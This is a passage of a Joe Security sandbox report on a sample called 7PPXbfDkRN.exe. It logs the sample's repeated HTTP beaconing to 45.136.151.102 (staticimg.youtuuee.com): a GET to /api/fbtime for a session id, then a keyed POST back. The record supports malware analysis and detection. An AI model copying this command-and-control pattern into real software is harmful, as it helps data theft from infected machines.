1414 OUT POST /api/?sid=2150799&key=5bcf6127fb480887256a415fe5d0b555 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:46.761059046 CEST

1415 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

29 192.168.2.5 49783 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:47.079695940 CEST

1416 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:47.225680113 CEST

1416 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 33 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 70 68 55 71 4d 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150837,"time":1635061607,"rand_str":"KphUqM"}0

Oct 24, 2021 09:46:47.235615015 CEST

1417 OUT POST /api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 40 of 58

Page 41: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:47.394483089 CEST

1417 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

3 192.168.2.5 49751 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:15.055269003 CEST

1325 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:15.203010082 CEST

1325 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 31 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4d 4a 77 39 36 5a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149311,"time":1635061575,"rand_str":"MJw96Z"}0

Oct 24, 2021 09:46:15.348901987 CEST

1325 OUT POST /api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:15.500364065 CEST

1326 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

30 192.168.2.5 49784 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:47.728708982 CEST

1418 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:47.883045912 CEST

1419 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 36 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 61 6e 45 43 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150867,"time":1635061607,"rand_str":"FhanEC"}0

Oct 24, 2021 09:46:47.894747019 CEST

1419 OUT POST /api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 41 of 58

Page 42: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:48.056725025 CEST

1420 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

31 192.168.2.5 49785 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:48.383100033 CEST

1420 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:48.527046919 CEST

1421 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6b 55 76 64 65 78 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150907,"time":1635061608,"rand_str":"kUvdex"}0

Oct 24, 2021 09:46:48.538640976 CEST

1421 OUT POST /api/?sid=2150907&key=021ad353d9168c6646a91ee81aef17bd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:48.688570976 CEST

1422 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

32 192.168.2.5 49786 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:49.005182028 CEST

1423 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:49.163343906 CEST

1423 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 45 4a 48 53 54 54 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150939,"time":1635061609,"rand_str":"EJHSTT"}0

Oct 24, 2021 09:46:49.172435045 CEST

1424 OUT POST /api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 42 of 58

Page 43: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:49.329922915 CEST

1424 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

33 192.168.2.5 49787 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:49.640058994 CEST

1425 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:49.786853075 CEST

1425 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 7a 36 46 33 32 38 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150977,"time":1635061609,"rand_str":"z6F328"}0

Oct 24, 2021 09:46:49.794687033 CEST

1426 OUT POST /api/?sid=2150977&key=4ee7a2d959cb4a10f673c7d88974a245 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:49.950081110 CEST

1426 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

34 192.168.2.5 49788 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:50.273909092 CEST

1427 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:50.421237946 CEST

1428 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 31 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4a 55 78 34 46 37 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151013,"time":1635061610,"rand_str":"JUx4F7"}0

Oct 24, 2021 09:46:50.438482046 CEST

1428 OUT POST /api/?sid=2151013&key=46e6a5a1a8c4f08d053bfa44a82eaf14 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 43 of 58

Page 44: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:50.593585968 CEST

1429 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

35 192.168.2.5 49789 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:50.905320883 CEST

1430 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:51.051181078 CEST

1430 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 35 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6a 54 5a 36 67 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151055,"time":1635061610,"rand_str":"jTZ6gy"}0

Oct 24, 2021 09:46:51.059366941 CEST

1430 OUT POST /api/?sid=2151055&key=7cebe7828b58fe3eef762f25303a291a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:51.219743013 CEST

1431 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

36 192.168.2.5 49790 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:51.530956984 CEST

1432 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:51.677324057 CEST

1432 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 6e 4a 32 4d 66 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151095,"time":1635061611,"rand_str":"unJ2Mf"}0

Oct 24, 2021 09:46:51.685113907 CEST

1433 OUT POST /api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 44 of 58

Page 45: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:51.835508108 CEST

1433 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

37 192.168.2.5 49791 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:52.154023886 CEST

1434 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:52.302098036 CEST

1435 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 72 33 7a 62 39 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151139,"time":1635061612,"rand_str":"r3zb9y"}0

Oct 24, 2021 09:46:52.310817957 CEST

1435 OUT POST /api/?sid=2151139&key=e095cad2278f925f7e4a191097cfde84 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:52.470722914 CEST

1436 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

38 192.168.2.5 49792 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:52.784478903 CEST

1437 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:52.932136059 CEST

1437 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 79 79 64 7a 35 63 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151177,"time":1635061612,"rand_str":"yydz5c"}0

Oct 24, 2021 09:46:52.938849926 CEST

1437 OUT POST /api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 45 of 58

Page 46: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:53.089015007 CEST

1438 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

39 192.168.2.5 49793 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:53.411200047 CEST

1439 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:53.569130898 CEST

1439 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 30 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 66 78 51 4e 6e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151209,"time":1635061613,"rand_str":"FfxQNn"}0

Oct 24, 2021 09:46:53.582036972 CEST

1440 OUT POST /api/?sid=2151209&key=414c662eb1fa32ce4fe76d6805230a51 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:53.740051985 CEST

1440 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

4 192.168.2.5 49752 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:16.084330082 CEST

1327 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:16.232496023 CEST

1327 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 57 4a 74 4b 61 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149343,"time":1635061576,"rand_str":"uWJtKa"}0

Oct 24, 2021 09:46:16.322035074 CEST

1328 OUT POST /api/?sid=2149343&key=522b94416aa18897bef2f92ed75a7b55 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 46 of 58

Page 47: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:16.475416899 CEST

1328 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

40 192.168.2.5 49794 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:54.040618896 CEST

1441 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:54.190620899 CEST

